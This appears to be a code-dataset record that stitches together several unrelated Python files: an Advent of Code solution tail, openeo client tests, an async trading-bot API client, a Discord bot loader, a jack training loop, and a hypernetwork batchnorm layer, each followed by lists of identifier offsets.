inlist = np.array([list(map(int, l)) for l in data.split('\n')])
print(inlist)
grid = inlist.copy()
num_flashes = 0
for i in range(100):
num_flashes += np.sum(step(grid))
print(num_flashes)
answer = num_flashes
aocd.submit(answer, part='a', day=DAY, year=YEAR)
grid = inlist.copy()
for i in itertools.count(1):
flash = step(grid)
if np.all(flash):
answer = i
break
print(answer)
aocd.submit(answer, part='b', day=DAY, year=YEAR)
if __name__ == '__main__':
main()
| [
[
[
63,
74
]
],
[
[
82,
91
]
],
[
[
99,
101
]
],
[
[
109,
118
],
[
1302,
1311
]
],
[
[
126,
140
]
],
[
[
148,
150
]
],
[
[
158,
164
]
],
[
[
173,
184
],
[
263,
265
],
[
305,
307
],
[
973,
975
],
[
1141,
1143
],
[
1360,
1362
]
],
[
[
192,
196
],
[
926,
930
],
[
1213,
1217
],
[
1438,
1442
]
],
[
[
198,
202
],
[
954,
958
],
[
1257,
1261
],
[
1482,
1486
]
],
[
[
210,
213
],
[
944,
947
],
[
1247,
1250
],
[
1472,
1475
]
],
[
[
225,
229
],
[
1148,
1152
],
[
1338,
1342
]
],
[
[
780,
784
],
[
1521,
1525
]
]
] |
import unittest.mock as mock
import pytest
import requests_mock
from openeo.rest.auth.auth import NullAuth, BearerAuth
from openeo.rest.connection import Connection, RestApiConnection, connect, OpenEoApiError
API_URL = "https://oeo.net/"
@pytest.mark.parametrize(
["base", "paths", "expected_path"],
[
# Simple
("https://oeo.net", ["foo", "/foo"], "https://oeo.net/foo"),
("https://oeo.net/", ["foo", "/foo"], "https://oeo.net/foo"),
# With trailing slash
("https://oeo.net", ["foo/", "/foo/"], "https://oeo.net/foo/"),
("https://oeo.net/", ["foo/", "/foo/"], "https://oeo.net/foo/"),
# Deeper
("https://oeo.net/api/v04", ["foo/bar", "/foo/bar"], "https://oeo.net/api/v04/foo/bar"),
("https://oeo.net/api/v04/", ["foo/bar", "/foo/bar"], "https://oeo.net/api/v04/foo/bar"),
("https://oeo.net/api/v04", ["foo/bar/", "/foo/bar/"], "https://oeo.net/api/v04/foo/bar/"),
("https://oeo.net/api/v04/", ["foo/bar/", "/foo/bar/"], "https://oeo.net/api/v04/foo/bar/"),
]
)
def test_rest_api_connection_url_handling(requests_mock, base, paths, expected_path):
"""Test connection __init__ and proper joining of root url and API path"""
conn = RestApiConnection(base)
requests_mock.get(expected_path, text="payload")
requests_mock.post(expected_path, text="payload")
for path in paths:
assert conn.get(path).text == "payload"
assert conn.post(path, {"foo": "bar"}).text == "payload"
def test_rest_api_headers():
conn = RestApiConnection(API_URL)
with requests_mock.Mocker() as m:
def text(request, context):
assert request.headers["User-Agent"].startswith("openeo-python-client")
assert request.headers["X-Openeo-Bar"] == "XY123"
m.get("/foo", text=text)
m.post("/foo", text=text)
conn.get("/foo", headers={"X-Openeo-Bar": "XY123"})
conn.post("/foo", {}, headers={"X-Openeo-Bar": "XY123"})
def test_connection_with_session():
session = mock.Mock()
response = session.request.return_value
response.status_code = 200
response.json.return_value = {"foo": "bar"}
conn = Connection("https://oeo.net/", session=session)
assert conn.capabilities().capabilities == {"foo": "bar"}
session.request.assert_any_call(
url="https://oeo.net/", method="get", headers=mock.ANY, stream=mock.ANY, auth=mock.ANY
)
def test_connect_with_session():
session = mock.Mock()
response = session.request.return_value
response.status_code = 200
response.json.return_value = {"foo": "bar"}
conn = connect("https://oeo.net/", session=session)
assert conn.capabilities().capabilities == {"foo": "bar"}
session.request.assert_any_call(
url="https://oeo.net/", method="get", headers=mock.ANY, stream=mock.ANY, auth=mock.ANY
)
def test_api_error(requests_mock):
conn = Connection(API_URL)
requests_mock.get('https://oeo.net/collections/foobar', status_code=404, json={
"code": "CollectionNotFound", "message": "No such things as a collection 'foobar'", "id": "54321"
})
with pytest.raises(OpenEoApiError) as exc_info:
conn.describe_collection("foobar")
exc = exc_info.value
assert exc.http_status_code == 404
assert exc.code == "CollectionNotFound"
assert exc.message == "No such things as a collection 'foobar'"
assert exc.id == "54321"
assert exc.url is None
def test_api_error_non_json(requests_mock):
conn = Connection(API_URL)
requests_mock.get('https://oeo.net/collections/foobar', status_code=500, text="olapola")
with pytest.raises(OpenEoApiError) as exc_info:
conn.describe_collection("foobar")
exc = exc_info.value
assert exc.http_status_code == 500
assert exc.code == "unknown"
assert exc.message == "olapola"
assert exc.id is None
assert exc.url is None
def test_authenticate_basic(requests_mock):
conn = Connection(API_URL)
def text_callback(request, context):
assert request.headers["Authorization"] == "Basic am9objpqMGhu"
return '{"access_token":"w3lc0m3"}'
requests_mock.get('https://oeo.net/credentials/basic', text=text_callback)
assert isinstance(conn.auth, NullAuth)
conn.authenticate_basic(username="john", password="j0hn")
assert isinstance(conn.auth, BearerAuth)
assert conn.auth.bearer == "w3lc0m3"
def test_authenticate_oidc(oidc_test_setup):
# see test/rest/conftest.py for `oidc_test_setup` fixture
client_id = "myclient"
oidc_discovery_url = "https://oeo.net/credentials/oidc"
state, webbrowser_open = oidc_test_setup(client_id=client_id, oidc_discovery_url=oidc_discovery_url)
# With all this set up, kick off the openid connect flow
conn = Connection(API_URL)
assert isinstance(conn.auth, NullAuth)
conn.authenticate_OIDC(client_id=client_id, webbrowser_open=webbrowser_open)
assert isinstance(conn.auth, BearerAuth)
assert conn.auth.bearer == state["access_token"]
def test_load_collection_arguments(requests_mock):
conn = Connection(API_URL)
requests_mock.get(API_URL, json={"version": "0.4.0"})
requests_mock.get(API_URL + "collections/FOO", json={
"properties": {"eo:bands": [{"name": "red"}, {"name": "green"}, {"name": "blue"}]}
})
spatial_extent = {"west": 1, "south": 2, "east": 3, "north": 4}
temporal_extent = ["2019-01-01", "2019-01-22"]
im = conn.load_collection(
"FOO", spatial_extent=spatial_extent, temporal_extent=temporal_extent, bands=["red", "green"]
)
node = im.graph[im.node_id]
assert node["process_id"] == "load_collection"
assert node["arguments"] == {
"id": "FOO",
"spatial_extent": spatial_extent,
"temporal_extent": temporal_extent,
"bands": ["red", "green"]
}
| [
[
[
7,
28
],
[
2044,
2048
],
[
2391,
2395
],
[
2408,
2412
],
[
2423,
2427
],
[
2487,
2491
],
[
2831,
2835
],
[
2848,
2852
],
[
2863,
2867
]
],
[
[
37,
43
],
[
244,
250
],
[
3152,
3158
],
[
3649,
3655
]
],
[
[
51,
64
],
[
1588,
1601
]
],
[
[
100,
108
],
[
4270,
4278
],
[
4855,
4863
]
],
[
[
110,
120
],
[
4375,
4385
],
[
4979,
4989
]
],
[
[
156,
166
],
[
2190,
2200
],
[
2926,
2936
],
[
3527,
3537
],
[
3978,
3988
],
[
4802,
4812
],
[
5108,
5118
]
],
[
[
168,
185
],
[
1243,
1260
],
[
1552,
1569
]
],
[
[
187,
194
],
[
2633,
2640
]
],
[
[
196,
210
],
[
3166,
3180
],
[
3663,
3677
]
],
[
[
212,
219
],
[
1570,
1577
],
[
2937,
2944
],
[
3538,
3545
],
[
3989,
3996
],
[
4813,
4820
],
[
5119,
5126
],
[
5150,
5157
],
[
5208,
5215
]
],
[
[
1071,
1108
]
],
[
[
1516,
1537
]
],
[
[
1998,
2026
]
],
[
[
2444,
2469
]
],
[
[
2884,
2898
]
],
[
[
3476,
3499
]
],
[
[
3927,
3950
]
],
[
[
4434,
4456
]
],
[
[
5050,
5080
]
]
] |
import asyncio
import json
import logging
from datetime import datetime
from typing import Any, Dict, Iterable, List, Optional, Set, Union
import httpx
import websockets
from websockets import exceptions
logger = logging.getLogger("yufuquantsdk")
class WebsocketAPIClient:
def __init__(self, uri: str, ws: websockets.WebSocketClientProtocol = None) -> None:
self._uri: str = uri
self._ws: websockets.WebSocketClientProtocol = ws
self._authed: bool = False
self._api_key = ""
self._sub_topics: Set[str] = set()
self._inputs: asyncio.Queue[str] = asyncio.Queue()
self._outputs: asyncio.Queue[str] = asyncio.Queue(maxsize=100)
self._run_task: asyncio.Task[Any] = asyncio.get_event_loop().create_task(
self._run()
)
async def auth(self, api_key: str):
message = {
"cmd": "auth",
"api_key": api_key,
}
await self._deliver(json.dumps(message))
self._authed = True
self._api_key = api_key
async def sub(self, topics: Iterable[str]):
# Remove duplicated topics
if not isinstance(topics, set):
topics = set(topics)
message = {
"cmd": "sub",
"topics": list(topics), # Object of type set is not JSON serializable
}
await self._deliver(json.dumps(message))
self._sub_topics = topics
async def unsub(self, topics: Iterable[str]):
# Remove duplicated topics
if not isinstance(topics, set):
topics = set(topics)
message = {
"cmd": "unsub",
"topics": list(topics),
}
await self._deliver(json.dumps(message))
self._sub_topics = self._sub_topics - topics
async def robot_ping(self):
data = {"timestamp": int(datetime.now().timestamp() * 1000)}
message = {"category": "robotPing", "data": data}
await self._broadcast(message)
async def robot_log(self, text: str, level: str = "info"):
data = {
"text": text,
"level": level,
"timestamp": int(datetime.now().timestamp()) * 1000,
}
message = {"category": "robotLog", "data": data}
await self._broadcast(message)
async def robot_position_store(self, positions):
data = {
"updatedAt": datetime.now().isoformat(),
"positions": positions,
}
message = {"category": "robotPositionStore", "data": data}
await self._broadcast(message)
async def robot_order_store(self, orders):
data = {
"updatedAt": datetime.now().isoformat(),
"orders": orders,
}
message = {"category": "robotOrderStore", "data": data}
await self._broadcast(message)
async def robot_strategy_store(self, data):
d = {
"updatedAt": datetime.now().isoformat(),
"data": data,
}
message = {"category": "robotStrategyStore", "data": d}
await self._broadcast(message)
async def _connect(self, **kwargs):
# disable ping
kwargs["ping_interval"] = None
retry_count = 0
for i in range(3):
try:
self._ws = await websockets.connect(self._uri, **kwargs)
break
except Exception as exc:
logger.exception("Failed to connect to %s: %s.", self._uri, exc)
retry_count += 1
if retry_count >= 3:
raise
await asyncio.sleep(10)
logger.info("Connected to %s.", self._uri)
async def _reconnect(self):
await self._connect()
if self._authed:
await self.auth(self._api_key)
if len(self._sub_topics) > 0:
await self.sub(self._sub_topics)
logger.info("Reconnected to %s.", self._uri)
async def _deliver(self, s: str):
await self._inputs.put(s)
async def _send(self, s: str):
assert self._ws is not None, "No connection!"
try:
await self._ws.send(s)
logger.debug(">>> %s", s)
except websockets.ConnectionClosed as exc:
logger.exception(exc)
await self._reconnect()
async def _broadcast(self, message: Dict):
data = {"cmd": "broadcast", "message": message}
await self._deliver(json.dumps(data))
async def _pong(self, message: Dict[str, int]):
await self._send(json.dumps({"pong": message["ping"]}))
# todo: handle stop signal
async def _run(self):
await self._connect()
try:
while True:
incoming: asyncio.Task[Any] = asyncio.create_task(self._ws.recv())
outgoing: asyncio.Task[Any] = asyncio.create_task(self._inputs.get())
done: Set[asyncio.Future[Any]]
pending: Set[asyncio.Future[Any]]
done, pending = await asyncio.wait(
[incoming, outgoing], return_when=asyncio.FIRST_COMPLETED
)
# Cancel pending tasks to avoid leaking them.
if incoming in pending:
incoming.cancel()
if outgoing in pending:
outgoing.cancel()
if incoming in done:
try:
message = incoming.result()
logger.debug("<<< %s", message)
except websockets.ConnectionClosed as exc:
logger.exception(exc)
await self._reconnect()
else:
decoded = json.loads(message)
if "ping" in decoded:
await self._pong(decoded)
else:
try:
self._outputs.put_nowait(decoded)
except asyncio.QueueFull:
logger.warning("The outputs queue is full.")
if outgoing in done:
message = outgoing.result()
await self._send(message)
finally:
await self.close()
async def close(self):
ws = self._ws
self._ws = None
await ws.close()
close_status = exceptions.format_close(ws.close_code, ws.close_reason)
logger.info(f"Connection closed: {close_status}.")
ROBOT_REQ_PATH = "/robots/{robot_id}/"
ROBOT_PING_REQ_PATH = "/robots/{robot_id}/ping/"
ROBOT_ASSET_RECORD_REQ_PATH = "/robots/{robot_id}/assetRecord/"
ROBOT_STRATEGY_PARAMETERS_REQ_PATH = "/robots/{robot_id}/strategyParameters/"
ROBOT_CREDENTIAL_KEY_REQ_PATH = "/robots/{robot_id}/credentialKey/"
ROBOT_POSITION_STORE_REQ_PATH = "/robots/{robot_id}/positionStore/"
ROBOT_ORDER_STORE_REQ_PATH = "/robots/{robot_id}/orderStore/"
ROBOT_STRATEGY_STORE_REQ_PATH = "/robots/{robot_id}/strategyStore/"
class RESTAPIClient:
def __init__(self, base_url: str, api_key: str):
self._base_url: str = base_url.rstrip("/")
self._api_key: str = api_key
async def get_robot(self, robot_id: int):
req_path = ROBOT_REQ_PATH.format(robot_id=robot_id)
return await self._request("GET", req_path)
async def update_robot_asset_record(self, robot_id: int, data: Dict[str, Any]):
req_path = ROBOT_ASSET_RECORD_REQ_PATH.format(robot_id=robot_id)
return await self._request("PATCH", req_path, data=data)
async def update_robot_strategy_store(self, robot_id: int, data: Dict[str, Any]):
req_path = ROBOT_STRATEGY_STORE_REQ_PATH.format(robot_id=robot_id)
return await self._request("PUT", req_path, data=data)
async def update_robot_position_store(
self, robot_id: int, data: List[Dict[str, Any]]
):
req_path = ROBOT_POSITION_STORE_REQ_PATH.format(robot_id=robot_id)
return await self._request("PUT", req_path, data=data)
async def update_robot_order_store(self, robot_id: int, data: List[Dict[str, Any]]):
req_path = ROBOT_ORDER_STORE_REQ_PATH.format(robot_id=robot_id)
return await self._request("PUT", req_path, data=data)
async def ping_robot(self, robot_id: int):
req_path = ROBOT_PING_REQ_PATH.format(robot_id=robot_id)
return await self._request("POST", req_path)
async def get_robot_strategy_parameters(self, robot_id: int):
req_path = ROBOT_STRATEGY_PARAMETERS_REQ_PATH.format(robot_id=robot_id)
return await self._request("GET", req_path)
async def get_robot_credential_key(self, robot_id: int):
req_path = ROBOT_CREDENTIAL_KEY_REQ_PATH.format(robot_id=robot_id)
return await self._request("GET", req_path)
async def _request(
self,
method: str,
req_path: str,
headers: Optional[Dict[str, str]] = None,
params: Optional[Dict[str, str]] = None,
data: Optional[Union[Dict, List]] = None,
auth: bool = True,
):
req_headers = {"Content-Type": "application/json"}
if auth:
req_headers["X-Api-Key"] = self._api_key
if headers is not None:
req_headers.update(headers)
url = self._base_url + req_path
async with httpx.AsyncClient() as client:
logger.debug(
"%s %s, Request<headers=%s params=%s data=%s>",
method,
url,
req_headers,
params,
data,
)
res = await client.request(
method,
url,
headers=req_headers,
params=params,
json=data,
timeout=5,
)
http_text = res.text
logger.debug(
"%s %s, Response<status_code=%s headers=%s http_text=%s>",
method,
url,
res.status_code,
req_headers,
http_text,
)
res.raise_for_status()
if res.status_code == "204":
return None
return res.json()
| [
[
[
7,
14
],
[
601,
608
],
[
580,
587
],
[
661,
668
],
[
640,
647
],
[
732,
739
],
[
712,
719
],
[
3578,
3585
],
[
4725,
4732
],
[
4705,
4712
],
[
4808,
4815
],
[
4788,
4795
],
[
4875,
4882
],
[
4925,
4932
],
[
4984,
4991
],
[
5052,
5059
],
[
5985,
5992
]
],
[
[
22,
26
],
[
962,
966
],
[
1368,
1372
],
[
1705,
1709
],
[
4419,
4423
],
[
4515,
4519
],
[
5701,
5705
]
],
[
[
34,
41
],
[
215,
222
]
],
[
[
63,
71
],
[
1845,
1853
],
[
2142,
2150
],
[
2380,
2388
],
[
2650,
2658
],
[
2909,
2917
]
],
[
[
91,
94
],
[
725,
728
],
[
4718,
4721
],
[
4801,
4804
],
[
4890,
4893
],
[
4940,
4943
],
[
7397,
7400
],
[
7622,
7625
],
[
7861,
7864
],
[
8094,
8097
]
],
[
[
96,
100
],
[
4328,
4332
],
[
4473,
4477
],
[
7387,
7391
],
[
7612,
7616
],
[
7851,
7855
],
[
8084,
8088
],
[
8900,
8904
],
[
8949,
8953
],
[
9002,
9006
]
],
[
[
102,
110
],
[
1076,
1084
],
[
1458,
1466
]
],
[
[
112,
116
],
[
7846,
7850
],
[
8079,
8083
],
[
9008,
9012
]
],
[
[
118,
126
],
[
8891,
8899
],
[
8940,
8948
],
[
8987,
8995
]
],
[
[
128,
131
],
[
541,
544
],
[
4871,
4874
],
[
4921,
4924
]
],
[
[
133,
138
],
[
8996,
9001
]
],
[
[
147,
152
],
[
9318,
9323
]
],
[
[
160,
170
],
[
314,
324
],
[
413,
423
],
[
3280,
3290
],
[
4181,
4191
],
[
5511,
5521
]
],
[
[
194,
204
],
[
6383,
6393
]
],
[
[
206,
212
],
[
3395,
3401
],
[
3604,
3610
],
[
3872,
3878
],
[
4140,
4146
],
[
4229,
4235
],
[
5452,
5458
],
[
6036,
6042
],
[
5571,
5577
],
[
6447,
6453
],
[
9361,
9367
],
[
9839,
9845
]
],
[
[
257,
275
]
],
[
[
6500,
6514
],
[
7226,
7240
]
],
[
[
6539,
6558
],
[
8304,
8323
]
],
[
[
6588,
6615
],
[
7423,
7450
]
],
[
[
6652,
6686
],
[
8489,
8523
]
],
[
[
6730,
6759
],
[
8683,
8712
]
],
[
[
6798,
6827
],
[
7893,
7922
]
],
[
[
6866,
6892
],
[
8121,
8147
]
],
[
[
6928,
6957
],
[
7648,
7677
]
],
[
[
7004,
7017
]
]
] |
import discord
from discord.ext import commands
import os
intents = discord.Intents.default()
intents.members = True
testing = False
client = commands.Bot(command_prefix = "-", case_insensitive = True, intents=intents)
client.remove_command('help')
for filename in os.listdir('./cogs'):
if filename.endswith('.py'):
client.load_extension(f'cogs.{filename[:-3]}')
client.run('# Discord Bot Token here') | [
[
[
7,
14
],
[
73,
80
]
],
[
[
40,
48
],
[
154,
162
]
],
[
[
57,
59
],
[
283,
285
]
],
[
[
63,
70
],
[
100,
107
],
[
222,
229
]
],
[
[
126,
133
]
],
[
[
145,
151
],
[
234,
240
],
[
348,
354
],
[
398,
404
]
],
[
[
271,
279
],
[
313,
321
],
[
378,
386
]
]
] |
# -*- coding: utf-8 -*-
import logging
import math
import os
import random
import shutil
import tensorflow as tf
from jack import readers
from jack.core.tensorflow import TFReader
from jack.eval import evaluate_reader, pretty_print_results
from jack.util.hooks import LossHook, ExamplesPerSecHook, ETAHook
logger = logging.getLogger(__name__)
def train(reader, train_data, test_data, dev_data, configuration: dict, debug=False):
if isinstance(reader, TFReader):
train_tensorflow(reader, train_data, test_data, dev_data, configuration, debug)
else:
train_pytorch(reader, train_data, test_data, dev_data, configuration, debug)
def train_tensorflow(reader, train_data, test_data, dev_data, configuration: dict, debug=False):
import tensorflow as tf
seed = configuration.get('seed', 0)
# make everything deterministic
random.seed(seed)
tf.set_random_seed(seed)
clip_value = configuration.get('clip_value')
batch_size = configuration.get('batch_size')
dev_batch_size = configuration.get('dev_batch_size') or batch_size
epochs = configuration.get('epochs')
l2 = configuration.get('l2')
optimizer = configuration.get('optimizer')
learning_rate = configuration.get('learning_rate')
min_learning_rate = configuration.get('min_learning_rate')
learning_rate_decay = configuration.get('learning_rate_decay')
log_interval = configuration.get('log_interval')
validation_interval = configuration.get('validation_interval')
tensorboard_folder = configuration.get('tensorboard_folder')
reader_type = configuration.get('reader')
save_dir = configuration.get('save_dir')
write_metrics_to = configuration.get('write_metrics_to')
if clip_value != 0.0:
clip_value = - abs(clip_value), abs(clip_value)
learning_rate = tf.get_variable("learning_rate", initializer=learning_rate, dtype=tf.float32, trainable=False)
lr_decay_op = learning_rate.assign(tf.maximum(learning_rate_decay * learning_rate, min_learning_rate))
name_to_optimizer = {
'gd': tf.train.GradientDescentOptimizer,
'adam': tf.train.AdamOptimizer,
'adagrad': tf.train.AdagradOptimizer,
'adadelta': tf.train.AdadeltaOptimizer,
'rmsprop': tf.train.RMSPropOptimizer
}
if optimizer not in name_to_optimizer:
raise ValueError('Unknown optimizer: {}'.format(optimizer))
tf_optimizer_class = name_to_optimizer[optimizer]
tf_optimizer = tf_optimizer_class(learning_rate=learning_rate)
sw = None
if tensorboard_folder is not None:
if os.path.exists(tensorboard_folder):
shutil.rmtree(tensorboard_folder)
sw = tf.summary.FileWriter(tensorboard_folder)
# Hooks
iter_interval = 1 if debug else log_interval
hooks = [LossHook(reader, iter_interval, summary_writer=sw),
ETAHook(reader, iter_interval, int(math.ceil(len(train_data) / batch_size)), epochs),
ExamplesPerSecHook(reader, batch_size, iter_interval, sw)]
preferred_metric, best_metric = readers.eval_hooks[reader_type].preferred_metric_and_initial_score()
def side_effect(metrics, prev_metric):
"""Returns: a state (in this case a metric) that is used as input for the next call"""
if prev_metric is None: # store whole reader only at beginning of training
reader.store(save_dir)
m = metrics[preferred_metric]
if prev_metric is not None and m < prev_metric:
reader.session.run(lr_decay_op)
logger.info("Decayed learning rate to: %.5f" % reader.session.run(learning_rate))
elif m > best_metric[0] and save_dir is not None:
best_metric[0] = m
reader.model_module.store(os.path.join(save_dir, "model_module"))
logger.info("Saving reader to: %s" % save_dir)
return m
# this is the standard hook for the reader
hooks.append(readers.eval_hooks[reader_type](
reader, dev_data, dev_batch_size, summary_writer=sw, side_effect=side_effect,
iter_interval=validation_interval,
epoch_interval=(1 if validation_interval is None else None),
write_metrics_to=write_metrics_to))
# Train
reader.train(tf_optimizer, train_data, batch_size, max_epochs=epochs, hooks=hooks,
l2=l2, clip=clip_value, clip_op=tf.clip_by_value, summary_writer=sw)
# Test final reader
if dev_data is not None and save_dir is not None:
reader.load(save_dir)
result_dict = evaluate_reader(reader, dev_data, batch_size)
logger.info("############### Results on the Dev Set##############")
pretty_print_results(result_dict)
if test_data is not None and save_dir is not None:
reader.load(save_dir)
result_dict = evaluate_reader(reader, test_data, batch_size)
logger.info("############### Results on the Test Set##############")
pretty_print_results(result_dict)
def train_pytorch(reader, train_data, test_data, dev_data, configuration: dict, debug=False):
import torch
seed = configuration.get('seed')
# make everything deterministic
random.seed(seed)
torch.manual_seed(seed)
clip_value = configuration.get('clip_value')
batch_size = configuration.get('batch_size')
epochs = configuration.get('epochs')
l2 = configuration.get('l2')
optimizer = configuration.get('optimizer')
learning_rate = configuration.get('learning_rate')
learning_rate_decay = configuration.get('learning_rate_decay')
log_interval = configuration.get('log_interval')
validation_interval = configuration.get('validation_interval')
tensorboard_folder = configuration.get('tensorboard_folder')
model = configuration.get('reader')
save_dir = configuration.get('save_dir')
write_metrics_to = configuration.get('write_metrics_to')
# need setup here already :(
reader.setup_from_data(train_data, is_training=True)
if clip_value != 0.0:
clip_value = - abs(clip_value), abs(clip_value)
name_to_optimizer = {
'gd': torch.optim.SGD,
'adam': torch.optim.Adam,
'adagrad': torch.optim.Adagrad,
'adadelta': torch.optim.Adadelta
}
if optimizer not in name_to_optimizer:
raise ValueError('Unknown optimizer: {}'.format(optimizer))
torch_optimizer_class = name_to_optimizer[optimizer]
params = list(reader.model_module.prediction_module.parameters())
params.extend(reader.model_module.loss_module.parameters())
torch_optimizer = torch_optimizer_class(params, lr=learning_rate)
sw = None
if tensorboard_folder is not None:
if os.path.exists(tensorboard_folder):
shutil.rmtree(tensorboard_folder)
sw = tf.summary.FileWriter(tensorboard_folder)
# Hooks
iter_interval = 1 if debug else log_interval
hooks = [LossHook(reader, iter_interval, summary_writer=sw),
ExamplesPerSecHook(reader, batch_size, iter_interval, sw)]
preferred_metric, best_metric = readers.eval_hooks[model].preferred_metric_and_initial_score()
def side_effect(metrics, prev_metric):
"""Returns: a state (in this case a metric) that is used as input for the next call"""
m = metrics[preferred_metric]
if prev_metric is not None and m < prev_metric:
for param_group in torch_optimizer.param_groups:
param_group['lr'] *= learning_rate_decay
logger.info("Decayed learning rate to: %.5f" % param_group['lr'])
elif m > best_metric[0] and save_dir is not None:
best_metric[0] = m
if prev_metric is None: # store whole model only at beginning of training
reader.store(save_dir)
else:
reader.model_module.store(os.path.join(save_dir, "model_module"))
logger.info("Saving model to: %s" % save_dir)
return m
# this is the standard hook for the model
hooks.append(readers.eval_hooks[model](
reader, dev_data, batch_size, summary_writer=sw, side_effect=side_effect,
iter_interval=validation_interval,
epoch_interval=(1 if validation_interval is None else None),
write_metrics_to=write_metrics_to))
# Train
reader.train(torch_optimizer, train_data, batch_size, max_epochs=epochs, hooks=hooks,
l2=l2, clip=clip_value)
# Test final model
if dev_data is not None and save_dir is not None:
reader.load(save_dir)
result_dict = evaluate_reader(reader, dev_data, batch_size)
logger.info("############### Results on the Dev Set##############")
pretty_print_results(result_dict)
if test_data is not None and save_dir is not None:
reader.load(save_dir)
result_dict = evaluate_reader(reader, test_data, batch_size)
logger.info("############### Results on the Test Set##############")
pretty_print_results(result_dict)
| [
[
[
32,
39
],
[
319,
326
]
],
[
[
47,
51
],
[
2901,
2905
]
],
[
[
59,
61
],
[
2589,
2591
],
[
6663,
6665
],
[
3747,
3749
],
[
7807,
7809
]
],
[
[
69,
75
],
[
863,
869
],
[
5151,
5157
]
],
[
[
83,
89
],
[
2637,
2643
],
[
6711,
6717
]
],
[
[
98,
114
],
[
6758,
6760
]
],
[
[
133,
140
],
[
3061,
3068
],
[
3928,
3935
],
[
7036,
7043
],
[
7986,
7993
]
],
[
[
174,
182
],
[
461,
469
]
],
[
[
205,
220
],
[
4520,
4535
],
[
4793,
4808
],
[
8525,
8540
],
[
8798,
8813
]
],
[
[
222,
242
],
[
4651,
4671
],
[
4926,
4946
],
[
8656,
8676
],
[
8931,
8951
]
],
[
[
271,
279
],
[
2801,
2809
],
[
6875,
6883
]
],
[
[
281,
299
],
[
2965,
2983
],
[
6940,
6958
]
],
[
[
301,
308
],
[
2866,
2873
]
],
[
[
310,
316
],
[
4575,
4581
],
[
4849,
4855
],
[
8580,
8586
],
[
8854,
8860
],
[
3538,
3544
],
[
3799,
3805
],
[
7466,
7472
],
[
7859,
7865
]
],
[
[
353,
358
]
],
[
[
661,
677
],
[
480,
496
]
],
[
[
4966,
4979
],
[
578,
591
]
]
] |
#!/usr/bin/env python3
# Copyright 2019 Christian Henning
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
- **title** :utils/batchnorm_layer.py
- **author** :ch
- **contact** :henningc@ethz.ch
- **created** :09/02/2019
- **version** :1.0
- **python_version** :3.6.8
Implementation of a hypernet compatible batchnorm layer.
The joint use of batch-normalization and hypernetworks is not straight forward,
mainly due to the statistics accumulated by the batch-norm operation which
expect the weights of the main network to only change slowly. If a hypernetwork
replaces the whole set of weights, the statistics previously estimated by the
batch-norm layer might be completely off.
To circumvent this problem, we provide multiple solutions:
- In a continual learning setting with one set of weights per task, we can
simply estimate and store statistics per task (hence, the batch-norm
operation has to be conditioned on the task).
- The statistics are distilled into the hypernetwork. This would require
the addition of an extra loss term.
- The statistics can be treated as parameters that are outputted by the
hypernetwork. In this case, nothing enforces that these "statistics"
behave similar to statistics that would result from a running estimate
(hence, the resulting operation might have nothing in common with batch-
norm).
- Always use the statistics estimated on the current batch.
Note, we also provide the option of turning off the statistics, in which case
the statistics will be set to zero mean and unit variance. This is helpful when
interpreting batch-normalization as a general form of gain modulation (i.e.,
just applying a shift and scale to neural activities).
"""
from warnings import warn
import torch
import torch.nn as nn
import torch.nn.functional as F
class BatchNormLayer(nn.Module):
r"""Hypernetwork-compatible batch-normalization layer.
Note, batch normalization performs the following operation
.. math::
y = \frac{x - \mathrm{E}[x]}{\sqrt{\mathrm{Var}[x] + \epsilon}} * \
\gamma + \beta
This class allows to deviate from this standard implementation in order to
provide the flexibility required when using hypernetworks. Therefore, we
slightly change the notation to
.. math::
y = \frac{x - m_{\text{stats}}^{(t)}}{\sqrt{v_{\text{stats}}^{(t)} + \
\epsilon}} * \gamma^{(t)} + \beta^{(t)}
We use this notation to highlight that the running statistics
:math:`m_{\text{stats}}^{(t)}` and :math:`v_{\text{stats}}^{(t)}` are not
necessarily estimates resulting from mean and variance computation but might
be learned parameters (e.g., the outputs of a hypernetwork).
We additionally use the superscript :math:`(t)` to denote that the gain
:math:`\gamma`, offset :math:`\beta` and statistics may be dynamically
selected based on some external context information.
This class provides the possibility to checkpoint statistics
:math:`m_{\text{stats}}^{(t)}` and :math:`v_{\text{stats}}^{(t)}`, but
**not** gains and offsets.
.. note::
If context-dependent gains :math:`\gamma^{(t)}` and offsets
:math:`\beta^{(t)}` are required, then they have to be maintained
externally, e.g., via a task-conditioned hypernetwork (see
`this paper`_ for an example) and passed to the :meth:`forward` method.
.. _this paper: https://arxiv.org/abs/1906.00695
Attributes:
weights: A list of all internal weights of this layer. If all
weights are assumed to be generated externally, then this
attribute will be ``None``.
param_shapes: A list of list of integers. Each list represents the
shape of a parameter tensor. Note, this attribute is
independent of the attribute :attr:`weights`, it always comprises
the shapes of all weight tensors as if the network would be stand-
alone (i.e., no weights being passed to the :meth:`forward` method).
Note, unless ``learnable_stats`` is enabled, the layer statistics
are not considered here.
hyper_shapes: A list of list of integers. Each list represents the
shape of a weight tensor that can be passed to the :meth:`forward`
method. If all weights are maintained internally, then this
attribute will be ``None``.
Specifically, this attribute is controlled by the argument
``affine``. If ``affine`` is ``True``, this attribute will be
``None``. Otherwise this attribute contains the shape of
:math:`\gamma` and :math:`\beta`.
num_stats: The number :math:`T` of internally managed statistics
:math:`\{(m_{\text{stats}}^{(1)}, v_{\text{stats}}^{(1)}), \dots, \
(m_{\text{stats}}^{(T)}, v_{\text{stats}}^{(T)}) \}`. This number is
incremented everytime the method :meth:`checkpoint_stats` is called.
"""
def __init__(self, num_features, momentum=0.1, affine=True,
track_running_stats=True, frozen_stats=False,
learnable_stats=False):
r"""
Args:
num_features: See argument ``num_features``, for instance, of class
:class:`torch.nn.BatchNorm1d`.
momentum: See argument ``momentum`` of class
:class:`torch.nn.BatchNorm1d`.
affine: See argument ``affine`` of class
:class:`torch.nn.BatchNorm1d`. If set to :code:`False`, the
input activity will simply be "whitened" according to the
applied layer statistics (except if gain :math:`\gamma` and
offset :math:`\beta` are passed to the :meth:`forward` method).
Note, if ``learnable_stats`` is :code:`False`, then setting
``affine`` to :code:`False` results in no learnable weights for
this layer (running stats might still be updated, but not via
gradient descent).
Note, even if this option is ``False``, one may still pass a
gain :math:`\gamma` and offset :math:`\beta` to the
